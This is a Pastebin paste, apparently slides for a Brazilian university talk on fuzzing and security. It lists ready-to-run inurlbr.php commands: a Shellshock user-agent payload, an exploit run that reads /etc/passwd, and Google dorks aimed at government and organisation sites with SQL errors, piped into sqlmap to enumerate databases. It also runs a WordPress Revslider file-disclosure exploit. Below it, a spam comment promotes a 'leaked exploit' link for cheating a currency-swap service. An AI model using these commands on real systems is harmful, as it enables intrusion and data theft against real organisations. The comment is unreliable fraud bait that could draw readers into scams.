Googleinurl

[COMANDOS] APRESENTAÇÃO/ Fuzzing e segurança - UNINOVE

Apr 8th, 2015
2,163
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.53 KB | None | 0 0
  1. [+] Shellshock:
  2. set user-agent exploit;
  3. '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;{id}; echo END_CMD:;"'
  4.  
  5. - EXECUÇÃO + VALIDAÇÃO INTERNA:
  6. php inurlbr.php -o SHELLSHOCK_vull.txt -s vull.txt --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;{id}; echo END_CMD:;"' -t 2 -a 99887766555
  7.  
  8.  
  9. - EXECUÇÃO + XPL PRIV8:
  10. php inurlbr.php -o testarSHELLSHOCK.txt -s teste.txt --command-all 'php shellshock.php -t "_TARGETFULL_" -c "cat /etc/passwd"'
  11.  
  12.  
  13. [+] FIND PAGE:
  14. DORK: inurl:"/admin/index.php"
  15. php inurlbr.php --target 'www.geovisite.com' -s testes.txt -o url-list/adminpage.inurl -t 5
  16.  
  17. [+] SCAN ERROS SQLI
  18. DORK: (site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"
  19. php inurlbr.php --dork '(site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"' -s testes.txt --exploit-get "?'´0x27"
  20.  
  21.  
  22. [+] SCAN ERROS SQLI + sqlmap
  23. DORK: (site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"
  24. php inurlbr.php --dork '(site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"' -s testes.txt --exploit-get "?'´0x27" --command-all '../../sqlmap/./sqlmap.py -u "_TARGETFULL_" --dbs --proxy "http://localhost:8118"'
  25.  
  26.  
  27. [+] SCAN VULNS CMS WORDPRESS
  28. DORK: inurl:/admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
  29. php inurlbr.php --dork 'inurl:/admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s teste.txt --command-all 'php exploitWPLFD.php _TARGET_'
Advertisement
Comments
  • nasser5454
    66 days
    # CSS 0.85 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).
Add Comment
Please, Sign In to add comment